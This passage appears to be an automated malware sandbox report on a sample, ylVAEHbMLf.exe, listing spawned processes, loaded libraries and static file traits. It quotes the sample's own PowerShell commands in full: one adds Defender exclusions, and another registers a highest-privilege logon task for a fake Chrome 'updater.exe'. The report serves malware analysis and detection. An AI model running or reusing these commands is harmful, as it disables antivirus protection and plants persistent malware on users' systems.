Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ylVAEHbMLf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force	Jump to behavior
Source: C:\Users\user\Desktop\ylVAEHbMLf.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe	Jump to behavior
Source: C:\Users\user\Desktop\ylVAEHbMLf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbfytpia#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'HtfsFileManager' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'HtfsFileManager' -RunLevel 'Highest' -Force; }	Jump to behavior
Source: C:\Users\user\Desktop\ylVAEHbMLf.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbfytpia#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'HtfsFileManager' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'HtfsFileManager' -RunLevel 'Highest' -Force; }	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: ylVAEHbMLf.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: ylVAEHbMLf.exe

Static file information: File size 5980672 > 1048576

Source: ylVAEHbMLf.exe

Static PE information: Raw size of .data is bigger than: 0x100000 < 0x592e00

Source: ylVAEHbMLf.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctAB5F.tmp.pdb source: svchost.exe, 00000010.00000002.2963911331.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000010.00000002.2962181517.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811264979.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000010.00000002.2963911331.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000010.00000002.2963911331.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000010.00000002.2962181517.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.pdbr source: svchost.exe, 00000010.00000002.2963911331.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: WINLOA~1.PDB source: svchost.exe, 00000010.00000002.2963911331.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000010.00000002.2962181517.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811264979.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000010.00000002.2963911331.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct3D66.tmp.pdb source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000010.00000002.2962181517.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811264979.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000010.00000002.2962181517.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811264979.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 00000010.00000002.2963911331.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp

Data Obfuscation

Suspicious powershell command line found

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbfytpia#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'HtfsFileManager' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'HtfsFileManager' -RunLevel 'Highest' -Force; }
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbfytpia#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'HtfsFileManager' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'HtfsFileManager' -RunLevel 'Highest' -Force; }
Source: C:\Users\user\Desktop\ylVAEHbMLf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbfytpia#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'HtfsFileManager' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'HtfsFileManager' -RunLevel 'Highest' -Force; }	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbfytpia#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'HtfsFileManager' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'HtfsFileManager' -RunLevel 'Highest' -Force; }	Jump to behavior

Source: updater.exe.0.dr	Static PE information: real checksum: 0x5b59b2 should be: 0x5bad0c
Source: ylVAEHbMLf.exe	Static PE information: real checksum: 0x5b59b2 should be: 0x5bad0c
